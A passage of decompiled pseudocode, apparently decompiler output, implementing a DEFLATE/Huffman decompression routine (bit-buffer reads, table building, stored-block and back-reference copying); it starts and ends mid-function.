    										L387:
    										__eflags = _a24 & 0x00000002;
    										if((_a24 & 0x00000002) != 0) {
    											_v20 = 1;
    											 *_t1381 = 0x2a;
    											goto L396;
    										}
    										_t847 = 0;
    										goto L383;
    									}
    									__eflags = _v8 - _t1336;
    									if(_v8 >= _t1336) {
    										goto L376;
    									}
    									_t845 =  *_v8 & 0x000000ff;
    									_v8 = _v8 + 1;
    									goto L378;
    								}
    								_t845 =  *_t1243 & 0x000000ff;
    								_v8 =  &(_t1243[1]);
    								goto L378;
    							}
    							_t850 = _t844 - 1;
    							__eflags = _t850;
    							if(_t850 == 0) {
    								__eflags = _t1243 - _t1336;
    								if(_t1243 >= _t1336) {
    									goto L387;
    								}
    								_t847 =  *_t1243 & 0x000000ff;
    								_v8 =  &(_t1243[1]);
    								goto L383;
    							}
    							_t851 = _t850 - 9;
    							__eflags = _t851;
    							if(_t851 == 0) {
    								__eflags = _t1243 - _t1336;
    								if(_t1243 >= _t1336) {
    									L92:
    									__eflags = _a24 & 0x00000002;
    									if((_a24 & 0x00000002) != 0) {
    										_v20 = 1;
    										 *_t1381 = 0x33;
    										goto L396;
    									}
    									_t852 = 0;
    									__eflags = 0;
    									L94:
    									_v12 = _v12 | _t852 << _t1091;
    									_t1091 = _t1091 + 8;
    									__eflags = _t1091;
    									L95:
    									__eflags = _t1091 - 8;
    									if(_t1091 >= 8) {
    										_t1119 = _v12 & 0x000000ff;
    										_v12 = _v12 >> 8;
    										_v40 = _t1119;
    										_t1091 = _t1091 - 8;
    										__eflags = _t1091;
    										L99:
    										_t854 = _v28;
    										__eflags = _t854 - _v48;
    										if(_t854 >= _v48) {
    											_v20 = 2;
    											 *_t1381 = 0x34;
    											goto L396;
    										}
    										 *_t854 = _t1119;
    										_t117 =  &_v16;
    										 *_t117 = _v16 - 1;
    										__eflags =  *_t117;
    										_v28 =  &(_t854[0]);
    										L101:
    										__eflags = _v16;
    										if(_v16 == 0) {
    											L113:
    											__eflags = _t1381[5] & 0x00000001;
    											if((_t1381[5] & 0x00000001) == 0) {
    												L121:
    												__eflags = _t1091 - 3;
    												if(_t1091 < 3) {
    													__eflags = _v8 - _v24;
    													if(_v8 < _v24) {
    														_t858 =  *_v8 & 0x000000ff;
    														_t152 =  &_v8;
    														 *_t152 = _v8 + 1;
    														__eflags =  *_t152;
    														L120:
    														_v12 = _v12 | _t858 << _t1091;
    														_t1091 = _t1091 + 8;
    														__eflags = _t1091;
    														goto L121;
    													}
    													L117:
    													__eflags = _a24 & 0x00000002;
    													if((_a24 & 0x00000002) != 0) {
    														_v20 = 1;
    														 *_t1381 = 3;
    														goto L396;
    													}
    													_t858 = 0;
    													goto L120;
    												}
    												_v12 = _v12 >> 3;
    												_t861 = _v12 & 0x00000007;
    												_t1091 = _t1091 - 3;
    												_t1381[5] = _t861;
    												_t862 = _t861 >> 1;
    												__eflags = _t862;
    												_v32 = _t1091;
    												_t1381[6] = _t862;
    												if(_t862 == 0) {
    													L322:
    													__eflags = _t1091 - (_t1091 & 0x00000007);
    													if(_t1091 < (_t1091 & 0x00000007)) {
    														__eflags = _v8 - _v24;
    														if(_v8 < _v24) {
    															_t867 =  *_v8 & 0x000000ff;
    															_t622 =  &_v8;
    															 *_t622 = _v8 + 1;
    															__eflags =  *_t622;
    															L321:
    															_v12 = _v12 | _t867 << _t1091;
    															_t1091 = _t1091 + 8;
    															__eflags = _t1091;
    															goto L322;
    														}
    														L318:
    														__eflags = _a24 & 0x00000002;
    														if((_a24 & 0x00000002) != 0) {
    															_v20 = 1;
    															 *_t1381 = 5;
    															goto L396;
    														}
    														_t867 = 0;
    														goto L321;
    													}
    													_t1131 = _t1091 & 0x00000007;
    													_v12 = _v12 >> _t1131;
    													_t1091 = _t1091 - _t1131;
    													_t628 =  &_v16;
    													 *_t628 = _v16 & 0x00000000;
    													__eflags =  *_t628;
    													L324:
    													__eflags = _v16 - 4;
    													if(_v16 >= 4) {
    														_t871 = (_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff;
    														_v16 = _t871;
    														__eflags = _t871 - (((_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff) ^ 0x0000ffff);
    														if(_t871 != (((_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
    															goto L394;
    														}
    														_t1336 = _v24;
    														goto L101;
    													}
    													__eflags = _t1091;
    													if(_t1091 != 0) {
    														L334:
    														__eflags = _t1091 - 8;
    														if(_t1091 < 8) {
    															__eflags = _v8 - _v24;
    															if(_v8 < _v24) {
    																_t884 =  *_v8 & 0x000000ff;
    																_t645 =  &_v8;
    																 *_t645 = _v8 + 1;
    																__eflags =  *_t645;
    																L333:
    																_v12 = _v12 | _t884 << _t1091;
    																_t1091 = _t1091 + 8;
    																__eflags = _t1091;
    																goto L334;
    															}
    															L330:
    															__eflags = _a24 & 0x00000002;
    															if((_a24 & 0x00000002) != 0) {
    																_v20 = 1;
    																 *_t1381 = 6;
    																goto L396;
    															}
    															_t884 = 0;
    															goto L333;
    														}
    														_v12 = _v12 >> 8;
    														 *( &(_t1381[0xa48]) + _v16) = _v12;
    														_t1091 = _t1091 - 8;
    														L337:
    														_v16 = _v16 + 1;
    														goto L324;
    													}
    													__eflags = _v8 - _v24;
    													if(_v8 < _v24) {
    														_t657 =  &_v8;
    														 *_t657 = _v8 + 1;
    														__eflags =  *_t657;
    														 *( &(_t1381[0xa48]) + _v16) =  *_v8;
    														goto L337;
    													}
    													L327:
    													__eflags = _a24 & 0x00000002;
    													if((_a24 & 0x00000002) != 0) {
    														_v20 = 1;
    														 *_t1381 = 7;
    														goto L396;
    													}
    													 *( &(_t1381[0xa48]) + _v16) = 0;
    													goto L337;
    												}
    												__eflags = _t862 - 3;
    												if(_t862 == 3) {
    													L349:
    													 *_t1381 = 0xa;
    													goto L395;
    												}
    												__eflags = _t862 - 1;
    												if(_t862 != 1) {
    													_t1347 = 0;
    													__eflags = 0;
    													L127:
    													_v16 = _t1347;
    													__eflags = _t1347 - 3;
    													if(_t1347 >= 3) {
    														memset( &(_t1381[0x6e0]), 0, 0x120);
    														_t1383 = _t1383 + 0xc;
    														_t202 =  &_v16;
    														 *_t202 = _v16 & 0x00000000;
    														__eflags =  *_t202;
    														L137:
    														__eflags = _v16 - _t1381[0xd];
    														if(_v16 < _t1381[0xd]) {
    															L161:
    															__eflags = _t1091 - 3;
    															if(_t1091 < 3) {
    																__eflags = _v8 - _v24;
    																if(_v8 < _v24) {
    																	_t896 =  *_v8 & 0x000000ff;
    																	_t261 =  &_v8;
    																	 *_t261 = _v8 + 1;
    																	__eflags =  *_t261;
    																	L160:
    																	_v12 = _v12 | _t896 << _t1091;
    																	_t1091 = _t1091 + 8;
    																	__eflags = _t1091;
    																	goto L161;
    																}
    																L157:
    																__eflags = _a24 & 0x00000002;
    																if((_a24 & 0x00000002) != 0) {
    																	_v20 = 1;
    																	 *_t1381 = 0xe;
    																	goto L396;
    																}
    																_t896 = 0;
    																goto L160;
    															}
    															_t267 = _v16 + 0x3e6620; // 0x121110
    															_v12 = _v12 >> 3;
    															_t1091 = _t1091 - 3;
    															_v16 = _v16 + 1;
    															_v32 = _t1091;
    															 *((char*)( &(_t1381[0x6e0]) + ( *_t267 & 0x000000ff))) = _v12 & 0x00000007;
    															goto L137;
    														}
    														_t1381[0xd] = 0x13;
    														L139:
    														_t900 = _t1381[6];
    														__eflags = _t900;
    														if(_t900 < 0) {
    															while(1) {
    																L215:
    																_t902 = _v24 - _v8;
    																__eflags = _t902 - 4;
    																if(_t902 < 4) {
    																	break;
    																}
    																__eflags = _v48 - _v28 - 2;
    																if(_v48 - _v28 < 2) {
    																	break;
    																}
    																__eflags = _t1091 - 0xf;
    																if(_t1091 < 0xf) {
    																	_v8 = _v8 + 2;
    																	_v12 = _v12 | ( *_v8 & 0x0000ffff) << _t1091;
    																	_t1091 = _t1091 + 0x10;
    																	__eflags = _t1091;
    																}
    																_t968 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
    																__eflags = _t968;
    																if(_t968 < 0) {
    																	_t1357 = 0xa;
    																	do {
    																		_t968 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1357 & 0x00000001) +  !_t968) * 2));
    																		_t1357 = _t1357 + 1;
    																		__eflags = _t968;
    																	} while (_t968 < 0);
    																	goto L223;
    																} else {
    																	_t1357 = _t968 >> 9;
    																	L223:
    																	_v12 = _v12 >> _t1357;
    																	_t1091 = _t1091 - _t1357;
    																	_v16 = _t968;
    																	__eflags = _t968 & 0x00000100;
    																	if((_t968 & 0x00000100) != 0) {
    																		L256:
    																		_v16 = _v16 & 0x000001ff;
    																		__eflags = _v16 - 0x100;
    																		if(_v16 == 0x100) {
    																			goto L113;
    																		}
    																		_t908 = _v16 * 4 - 0x404;
    																		_t482 = _t908 + 0x3e64a0; // 0x0
    																		_t1187 =  *_t482;
    																		_t483 = _t908 + 0x3e6420; // 0x1
    																		_v36 = _t1187;
    																		_v16 =  *_t483;
    																		__eflags = _t1187;
    																		if(_t1187 == 0) {
    																			L266:
    																			__eflags = _t1091 - 0xf;
    																			if(_t1091 >= 0xf) {
    																				L282:
    																				_t912 =  *((short*)(_t1381 + 0xf00 + (_v12 & 0x000003ff) * 2));
    																				__eflags = _t912;
    																				if(_t912 < 0) {
    																					_t1358 = 0xa;
    																					do {
    																						_t912 =  *((short*)(_t1381 + 0x1700 + ((_v12 >> _t1358 & 0x00000001) +  !_t912) * 2));
    																						_t1358 = _t1358 + 1;
    																						__eflags = _t912;
    																					} while (_t912 < 0);
    																					L286:
    																					_v12 = _v12 >> _t1358;
    																					_t1190 =  *(0x3e65a0 + _t912 * 4);
    																					_t1091 = _t1091 - _t1358;
    																					_v36 = _t1190;
    																					_v40 =  *((intOrPtr*)(0x3e6520 + _t912 * 4));
    																					__eflags = _t1190;
    																					if(_t1190 == 0) {
    																						L295:
    																						_t1191 = _v28;
    																						_t916 = _t1191 - _a12;
    																						_v56 = _t916;
    																						__eflags = _v40 - _t916;
    																						if(_v40 <= _t916) {
    																							L297:
    																							_t919 = (_t916 - _v40 & _v60) + _a12;
    																							__eflags = _t1191 - _t919;
    																							if(_t1191 <= _t919) {
    																								_t1191 = _t919;
    																							}
    																							__eflags = _t1191 + _v16 - _v48;
    																							if(_t1191 + _v16 <= _v48) {
    																								__eflags = _v16 - 9;
    																								if(_v16 < 9) {
    																									L312:
    																									_t1359 = _v28;
    																									do {
    																										L313:
    																										_v16 = _v16 - 3;
    																										 *_t1359 =  *_t919;
    																										 *((char*)(_t1359 + 1)) =  *((intOrPtr*)(_t919 + 1));
    																										 *((char*)(_t1359 + 2)) =  *((intOrPtr*)(_t919 + 2));
    																										_t1359 = _t1359 + 3;
    																										_t919 = _t919 + 3;
    																										__eflags = _v16 - 2;
    																									} while (_v16 > 2);
    																									__eflags = _v16;
    																									_v28 = _t1359;
    																									if(_v16 <= 0) {
    																										continue;
    																									}
    																									__eflags = _v16 - 1;
    																									 *_t1359 =  *_t919;
    																									if(_v16 <= 1) {
    																										L311:
    																										_v28 = _t1359 + _v16;
    																										continue;
    																									}
    																									L310:
    																									 *((char*)(_t1359 + 1)) =  *((intOrPtr*)(_t919 + 1));
    																									goto L311;
    																								}
    																								__eflags = _v16 - _v40;
    																								if(_v16 > _v40) {
    																									goto L312;
    																								}
    																								_t1362 = _v28;
    																								_t1200 = (_v16 & 0xfffffff8) + _t919;
    																								__eflags = _t1200;
    																								do {
    																									 *_t1362 =  *_t919;
    																									 *((intOrPtr*)(_t1362 + 4)) =  *((intOrPtr*)(_t919 + 4));
    																									_t919 = _t919 + 8;
    																									_t1362 = _t1362 + 8;
    																									__eflags = _t919 - _t1200;
    																								} while (_t919 < _t1200);
    																								_v16 = _v16 & 0x00000007;
    																								__eflags = _v16 - 3;
    																								_v28 = _t1362;
    																								if(_v16 >= 3) {
    																									goto L313;
    																								}
    																								__eflags = _v16;
    																								if(_v16 == 0) {
    																									continue;
    																								}
    																								__eflags = _v16 - 1;
    																								 *_t1362 =  *_t919;
    																								if(_v16 <= 1) {
    																									goto L311;
    																								}
    																								goto L310;
    																							} else {
    																								L300:
    																								_v16 = _v16 - 1;
    																								__eflags = _v16;
    																								if(_v16 == 0) {
    																									continue;
    																								}
    																								L301:
    																								_t922 = _v28;
    																								__eflags = _t922 - _v48;
    																								if(_t922 >= _v48) {
    																									_v20 = 2;
    																									 *_t1381 = 0x35;
    																									goto L396;
    																								}
    																								 *_t922 =  *((intOrPtr*)((_v56 - _v40 & _v60) + _a12));
    																								_v56 = _v56 + 1;
    																								_v28 = _t922 + 1;
    																								goto L300;
    																							}
    																						}
    																						__eflags = _a24 & 0x00000004;
    																						if((_a24 & 0x00000004) != 0) {
    																							L81:
    																							 *_t1381 = 0x25;
    																							goto L395;
    																						}
    																						goto L297;
    																					}
    																					L293:
    																					__eflags = _t1091 - _v36;
    																					if(_t1091 < _v36) {
    																						__eflags = _v8 - _v24;
    																						if(_v8 < _v24) {
    																							_t926 =  *_v8 & 0x000000ff;
    																							_t552 =  &_v8;
    																							 *_t552 = _v8 + 1;
    																							__eflags =  *_t552;
    																							L292:
    																							_v12 = _v12 | _t926 << _t1091;
    																							_t1091 = _t1091 + 8;
    																							__eflags = _t1091;
    																							goto L293;
    																						}
    																						L289:
    																						__eflags = _a24 & 0x00000002;
    																						if((_a24 & 0x00000002) != 0) {
    																							_v20 = 1;
    																							 *_t1381 = 0x1b;
    																							goto L396;
    																						}
    																						_t926 = 0;
    																						goto L292;
    																					}
    																					_t1207 = _v36;
    																					_t1091 = _t1091 - _t1207;
    																					_v12 = _v12 >> _t1207;
    																					_t561 =  &_v40;
    																					 *_t561 = _v40 + ((1 << _t1207) - 0x00000001 & _v12);
    																					__eflags =  *_t561;
    																					goto L295;
    																				}
    																				_t1358 = _t912 >> 9;
    																				_t912 = _t912 & 0x000001ff;
    																				goto L286;
    																			}
    																			_t933 = _v8;
    																			__eflags = _v24 - _t933 - 2;
    																			if(_v24 - _t933 >= 2) {
    																				_v8 =  &(_t933[2]);
    																				_v12 = _v12 | (_t933[1] & 0x000000ff) << _t1091 + 0x00000008 | ( *_t933 & 0x000000ff) << _t1091;
    																				_t1091 = _t1091 + 0x10;
    																				__eflags = _t1091;
    																				goto L282;
    																			}
    																			L268:
    																			_t937 =  *((short*)(_t1381 + 0xf00 + (_v12 & 0x000003ff) * 2));
    																			__eflags = _t937;
    																			if(_t937 < 0) {
    																				_t1212 = 0xa;
    																				__eflags = _t1091 - _t1212;
    																				if(_t1091 <= _t1212) {
    																					L275:
    																					__eflags = _v8 - _v24;
    																					if(_v8 < _v24) {
    																						_t940 =  *_v8 & 0x000000ff;
    																						_t521 =  &_v8;
    																						 *_t521 = _v8 + 1;
    																						__eflags =  *_t521;
    																						L279:
    																						_t941 = _t940 << _t1091;
    																						_t1091 = _t1091 + 8;
    																						_v12 = _v12 | _t941;
    																						__eflags = _t1091 - 0xf;
    																						if(_t1091 < 0xf) {
    																							goto L268;
    																						}
    																						goto L282;
    																					}
    																					L276:
    																					__eflags = _a24 & 0x00000002;
    																					if((_a24 & 0x00000002) != 0) {
    																						_v20 = 1;
    																						 *_t1381 = 0x1a;
    																						goto L396;
    																					}
    																					_t940 = 0;
    																					goto L279;
    																				} else {
    																					goto L273;
    																				}
    																				while(1) {
    																					L273:
    																					_t937 =  *((short*)(_t1381 + 0x1700 + ((_v12 >> _t1212 & 0x00000001) +  !_t937) * 2));
    																					_t1212 = _t1212 + 1;
    																					__eflags = _t937;
    																					if(_t937 >= 0) {
    																						goto L282;
    																					}
    																					_t514 = _t1212 + 1; // 0xc
    																					__eflags = _t1091 - _t514;
    																					if(_t1091 >= _t514) {
    																						continue;
    																					}
    																					goto L275;
    																				}
    																				goto L282;
    																			}
    																			_t943 = _t937 >> 9;
    																			__eflags = _t943;
    																			if(_t943 == 0) {
    																				goto L275;
    																			}
    																			__eflags = _t1091 - _t943;
    																			if(_t1091 >= _t943) {
    																				goto L282;
    																			}
    																			goto L275;
    																		}
    																		__eflags = _t1091 - _t1187;
    																		if(_t1091 >= _t1187) {
    																			L265:
    																			_t1091 = _t1091 - _v36;
    																			_v12 = _v12 >> _t1187;
    																			_t502 =  &_v16;
    																			 *_t502 = _v16 + ((1 << _t1187) - 0x00000001 & _v12);
    																			__eflags =  *_t502;
    																			goto L266;
    																		}
    																		L259:
    																		__eflags = _v8 - _v24;
    																		if(_v8 < _v24) {
    																			_t951 =  *_v8 & 0x000000ff;
    																			_t492 =  &_v8;
    																			 *_t492 = _v8 + 1;
    																			__eflags =  *_t492;
    																			L263:
    																			_t952 = _t951 << _t1091;
    																			_t1091 = _t1091 + 8;
    																			_v12 = _v12 | _t952;
    																			__eflags = _t1091 - _v36;
    																			if(_t1091 < _v36) {
    																				goto L259;
    																			}
    																			_t1187 = _v36;
    																			goto L265;
    																		}
    																		L260:
    																		__eflags = _a24 & 0x00000002;
    																		if((_a24 & 0x00000002) != 0) {
    																			_v20 = 1;
    																			 *_t1381 = 0x19;
    																			goto L396;
    																		}
    																		_t951 = 0;
    																		goto L263;
    																	}
    																	__eflags = _t1091 - 0xf;
    																	if(_t1091 < 0xf) {
    																		_v8 = _v8 + 2;
    																		_v12 = _v12 | ( *_v8 & 0x0000ffff) << _t1091;
    																		_t1091 = _t1091 + 0x10;
    																		__eflags = _t1091;
    																	}
    																	_t972 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
    																	__eflags = _t972;
    																	if(_t972 < 0) {
    																		_t1366 = 0xa;
    																		do {
    																			_t972 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1366 & 0x00000001) +  !_t972) * 2));
    																			_t1366 = _t1366 + 1;
    																			__eflags = _t972;
    																		} while (_t972 < 0);
    																		goto L230;
    																	} else {
    																		_t1366 = _t972 >> 9;
    																		L230:
    																		_t1297 = _v28;
    																		_v12 = _v12 >> _t1366;
    																		_t1091 = _t1091 - _t1366;
    																		 *_t1297 = _v16;
    																		__eflags = _t972 & 0x00000100;
    																		if((_t972 & 0x00000100) != 0) {
    																			_t473 =  &_v28;
    																			 *_t473 = _v28 + 1;
    																			__eflags =  *_t473;
    																			_v16 = _t972;
    																			goto L256;
    																		}
    																		_v28 = _v28 + 2;
    																		 *(_t1297 + 1) = _t972;
    																		continue;
    																	}
    																}
    															}
    															__eflags = _t1091 - 0xf;
    															if(_t1091 >= 0xf) {
    																L248:
    																_t905 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
    																__eflags = _t905;
    																if(_t905 < 0) {
    																	_t1348 = 0xa;
    																	do {
    																		_t905 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1348 & 0x00000001) +  !_t905) * 2));
    																		_t1348 = _t1348 + 1;
    																		__eflags = _t905;
    																	} while (_t905 < 0);
    																	L252:
    																	_v12 = _v12 >> _t1348;
    																	_t1091 = _t1091 - _t1348;
    																	_v16 = _t905;
    																	__eflags = _t905 - 0x100;
    																	if(_t905 >= 0x100) {
    																		goto L256;
    																	}
    																	L253:
    																	_t953 = _v28;
    																	__eflags = _t953 - _v48;
    																	if(_t953 >= _v48) {
    																		_v20 = 2;
    																		 *_t1381 = 0x18;
    																		goto L396;
    																	}
    																	 *_t953 = _v16;
    																	_v28 = _t953 + 1;
    																	goto L215;
    																}
    																_t1348 = _t905 >> 9;
    																_t905 = _t905 & 0x000001ff;
    																goto L252;
    															}
    															__eflags = _t902 - 2;
    															if(_t902 >= 2) {
    																_t955 = _v8;
    																_v8 =  &(_t955[2]);
    																_v12 = _v12 | (_t955[1] & 0x000000ff) << _t1091 + 0x00000008 | ( *_t955 & 0x000000ff) << _t1091;
    																_t1091 = _t1091 + 0x10;
    																__eflags = _t1091;
    																goto L248;
    															}
    															L234:
    															_t959 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
    															__eflags = _t959;
    															if(_t959 < 0) {
    																_t1144 = 0xa;
    																__eflags = _t1091 - _t1144;
    																if(_t1091 <= _t1144) {
    																	L241:
    																	__eflags = _v8 - _v24;
    																	if(_v8 < _v24) {
    																		_t962 =  *_v8 & 0x000000ff;
    																		_t448 =  &_v8;
    																		 *_t448 = _v8 + 1;
    																		__eflags =  *_t448;
    																		L245:
    																		_t963 = _t962 << _t1091;
    																		_t1091 = _t1091 + 8;
    																		_v12 = _v12 | _t963;
    																		__eflags = _t1091 - 0xf;
    																		if(_t1091 < 0xf) {
    																			goto L234;
    																		}
    																		goto L248;
    																	}
    																	L242:
    																	__eflags = _a24 & 0x00000002;
    																	if((_a24 & 0x00000002) != 0) {
    																		_v20 = 1;
    																		 *_t1381 = 0x17;
    																		goto L396;
    																	}
    																	_t962 = 0;
    																	goto L245;
    																} else {
    																	goto L239;
    																}
    																while(1) {
    																	L239:
    																	_t959 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1144 & 0x00000001) +  !_t959) * 2));
    																	_t1144 = _t1144 + 1;
    																	__eflags = _t959;
    																	if(_t959 >= 0) {
    																		goto L248;
    																	}
    																	_t441 = _t1144 + 1; // 0xc
    																	__eflags = _t1091 - _t441;
    																	if(_t1091 >= _t441) {
    																		continue;
    																	}
    																	goto L241;
    																}
    																goto L248;
    															}
    															_t965 = _t959 >> 9;
    															__eflags = _t965;
    															if(_t965 == 0) {
    																goto L241;
    															}
    															__eflags = _t1091 - _t965;
    															if(_t1091 >= _t965) {
    																goto L248;
    															}
    															goto L241;
    														}
    														_t209 =  &(_t1381[0x10]); // 0x40
    														_t1368 = _t209 + _t900 * 0xda0;
    														memset( &_v192, 0, 0x40);
    														_t211 = _t1368 + 0x120; // 0x160
    														memset(_t211, 0, 0x800);
    														_t212 = _t1368 + 0x920; // 0x960
    														memset(_t212, 0, 0x480);
    														_t988 =  *((intOrPtr*)(_t1381 + 0x2c + _t1381[6] * 4));
    														_t1383 = _t1383 + 0x24;
    														_t1150 = 0;
    														_v44 = _t988;
    														__eflags = _t988;
    														if(_t988 <= 0) {
    															L143:
    															_t1151 = 0;
    															_t1104 = 0;
    															__eflags = 0;
    															_v124 = 0;
    															_v128 = 0;
    															_t989 = 4;
    															do {
    																_t1298 =  *((intOrPtr*)(_t1382 + _t989 - 0xbc));
    																_t1151 = _t1151 + _t1298 + _t1151 + _t1298;
    																 *((intOrPtr*)(_t1382 + _t989 - 0x78)) = _t1151;
    																_t989 = _t989 + 4;
    																_t1104 = _t1104 + _t1298;
    																__eflags = _t989 - 0x3c;
    															} while (_t989 <= 0x3c);
    															__eflags = _t1151 - 0x10000;
    															if(_t1151 == 0x10000) {
    																L147:
    																_v20 = _v20 | 0xffffffff;
    																_v52 = _v52 & 0x00000000;
    																__eflags = _v44;
    																_t1091 = _v32;
    																if(_v44 <= 0) {
    																	L174:
    																	__eflags = _t1381[6] - 2;
    																	if(_t1381[6] != 2) {
    																		L214:
    																		_t1381[6] = _t1381[6] - 1;
    																		goto L139;
    																	}
    																	_t300 =  &_v16;
    																	 *_t300 = _v16 & 0x00000000;
    																	__eflags =  *_t300;
    																	L176:
    																	__eflags = _v16 - _t1381[0xc] + _t1381[0xb];
    																	if(_v16 >= _t1381[0xc] + _t1381[0xb]) {
    																		_t992 = _t1381[0xb];
    																		__eflags = _t1381[0xc] + _t992 - _v16;
    																		if(_t1381[0xc] + _t992 != _v16) {
    																			L357:
    																			 *_t1381 = 0x15;
    																			goto L395;
    																		}
    																		memcpy( &(_t1381[0x10]),  &(_t1381[0xa49]), _t992);
    																		memcpy( &(_t1381[0x378]), _t1381 + _t1381[0xb] + 0x2924, _t1381[0xc]);
    																		_t1383 = _t1383 + 0x18;
    																		goto L214;
    																	}
    																	__eflags = _t1091 - 0xf;
    																	if(_t1091 >= 0xf) {
    																		L193:
    																		_t1002 =  *((short*)(_t1381 + 0x1ca0 + (_v12 & 0x000003ff) * 2));
    																		__eflags = _t1002;
    																		if(_t1002 < 0) {
    																			_t1369 = 0xa;
    																			do {
    																				_t1002 =  *((short*)(_t1381 + 0x24a0 + ((_v12 >> _t1369 & 0x00000001) +  !_t1002) * 2));
    																				_t1369 = _t1369 + 1;
    																				__eflags = _t1002;
    																			} while (_t1002 < 0);
    																			L197:
    																			_v12 = _v12 >> _t1369;
    																			_t1091 = _t1091 - _t1369;
    																			_v40 = _t1002;
    																			_v32 = _t1091;
    																			__eflags = _t1002 - 0x10;
    																			if(__eflags >= 0) {
    																				if(__eflags != 0) {
    																					L201:
    																					_t1157 =  *((char*)(_t1002 + 0x3e6634));
    																					_v36 = _t1157;
    																					__eflags = _t1091 - _t1157;
    																					if(_t1091 >= _t1157) {
    																						L208:
    																						_t1004 = _v40;
    																						_t1091 = _t1091 - _t1157;
    																						_v32 = _t1091;
    																						_v12 = _v12 >> _t1157;
    																						_t1375 = ((1 << _t1157) - 0x00000001 & _v12) +  *((char*)(_t1004 + 0x3e6638));
    																						__eflags = _t1004 - 0x10;
    																						if(_t1004 != 0x10) {
    																							_t1005 = 0;
    																							__eflags = 0;
    																						} else {
    																							_t1005 =  *( &(_t1381[0xa48]) + _v16) & 0x000000ff;
    																						}
    																						memset( &(_t1381[0xa49]) + _v16, _t1005, _t1375);
    																						_t1383 = _t1383 + 0xc;
    																						_v16 = _v16 + _t1375;
    																						goto L176;
    																					}
    																					L202:
    																					__eflags = _v8 - _v24;
    																					if(_v8 < _v24) {
    																						_t1012 =  *_v8 & 0x000000ff;
    																						_t357 =  &_v8;
    																						 *_t357 = _v8 + 1;
    																						__eflags =  *_t357;
    																						L206:
    																						_t1013 = _t1012 << _t1091;
    																						_t1091 = _t1091 + 8;
    																						_v12 = _v12 | _t1013;
    																						__eflags = _t1091 - _v36;
    																						if(_t1091 < _v36) {
    																							goto L202;
    																						}
    																						_t1157 = _v36;
    																						goto L208;
    																					}
    																					L203:
    																					__eflags = _a24 & 0x00000002;
    																					if((_a24 & 0x00000002) != 0) {
    																						_v20 = 1;
    																						 *_t1381 = 0x12;
    																						goto L396;
    																					}
    																					_t1012 = 0;
    																					goto L206;
    																				}
    																				__eflags = _v16;
    																				if(_v16 == 0) {
    																					L355:
    																					 *_t1381 = 0x11;
    																					goto L395;
    																				}
    																				goto L201;
    																			}
    																			_v16 = _v16 + 1;
    																			 *( &(_t1381[0xa49]) + _v16) = _t1002;
    																			goto L176;
    																		}
    																		_t1369 = _t1002 >> 9;
    																		_t1002 = _t1002 & 0x000001ff;
    																		goto L197;
    																	}
    																	_t1014 = _v8;
    																	__eflags = _v24 - _t1014 - 2;
    																	if(_v24 - _t1014 >= 2) {
    																		_t327 = _t1091 + 8; // 0xa
    																		_v8 =  &(_t1014[2]);
    																		_v12 = _v12 | (_t1014[1] & 0x000000ff) << _t327 | ( *_t1014 & 0x000000ff) << _t1091;
    																		_t1091 = _t1091 + 0x10;
    																		__eflags = _t1091;
    																		goto L193;
    																	}
    																	L179:
    																	_t1018 =  *((short*)(_t1381 + 0x1ca0 + (_v12 & 0x000003ff) * 2));
    																	__eflags = _t1018;
    																	if(_t1018 < 0) {
    																		_t1163 = 0xa;
    																		__eflags = _t1091 - _t1163;
    																		if(_t1091 <= _t1163) {
    																			L186:
    																			__eflags = _v8 - _v24;
    																			if(_v8 < _v24) {
    																				_t1021 =  *_v8 & 0x000000ff;
    																				_t322 =  &_v8;
    																				 *_t322 = _v8 + 1;
    																				__eflags =  *_t322;
    																				L190:
    																				_t1022 = _t1021 << _t1091;
    																				_t1091 = _t1091 + 8;
    																				_v12 = _v12 | _t1022;
    																				__eflags = _t1091 - 0xf;
    																				if(_t1091 < 0xf) {
    																					goto L179;
    																				}
    																				goto L193;
    																			}
    																			L187:
    																			__eflags = _a24 & 0x00000002;
    																			if((_a24 & 0x00000002) != 0) {
    																				_v20 = 1;
    																				 *_t1381 = 0x10;
    																				goto L396;
    																			}
    																			_t1021 = 0;
    																			goto L190;
    																		} else {
    																			goto L184;
    																		}
    																		while(1) {
    																			L184:
    																			_t1018 =  *((short*)(_t1381 + 0x24a0 + ((_v12 >> _t1163 & 0x00000001) +  !_t1018) * 2));
    																			_t1163 = _t1163 + 1;
    																			__eflags = _t1018;
    																			if(_t1018 >= 0) {
    																				goto L193;
    																			}
    																			_t315 = _t1163 + 1; // 0xc
    																			__eflags = _t1091 - _t315;
    																			if(_t1091 >= _t315) {
    																				continue;
    																			}
    																			goto L186;
    																		}
    																		goto L193;
    																	}
    																	_t1024 = _t1018 >> 9;
    																	__eflags = _t1024;
    																	if(_t1024 == 0) {
    																		goto L186;
    																	}
    																	__eflags = _t1091 - _t1024;
    																	if(_t1091 >= _t1024) {
    																		goto L193;
    																	}
    																	goto L186;
    																} else {
    																	goto L148;
    																}
    																do {
    																	L148:
    																	_t1168 =  *(_v52 + _t1368) & 0x000000ff;
    																	_t1025 = 0;
    																	__eflags = _t1168;
    																	if(_t1168 == 0) {
    																		goto L173;
    																	}
    																	_t1312 = _t1382 + _t1168 * 4 - 0x7c;
    																	_t1105 =  *_t1312;
    																	_v44 = _t1105;
    																	 *_t1312 = _t1105 + 1;
    																	_t1313 = _t1168;
    																	__eflags = _t1168;
    																	if(_t1168 == 0) {
    																		L151:
    																		__eflags = _t1168 - 0xa;
    																		if(_t1168 > 0xa) {
    																			_t276 = (_t1025 & 0x000003ff) * 2; // 0x160
    																			_t1107 = _t1368 + _t276 + 0x120;
    																			_t1316 =  *_t1107;
    																			__eflags = _t1316;
    																			if(_t1316 == 0) {
    																				_t1316 = _v20;
    																				_t279 =  &_v20;
    																				 *_t279 = _v20 - 2;
    																				__eflags =  *_t279;
    																				 *_t1107 = _t1316;
    																			}
    																			_t1027 = _t1025 >> 9;
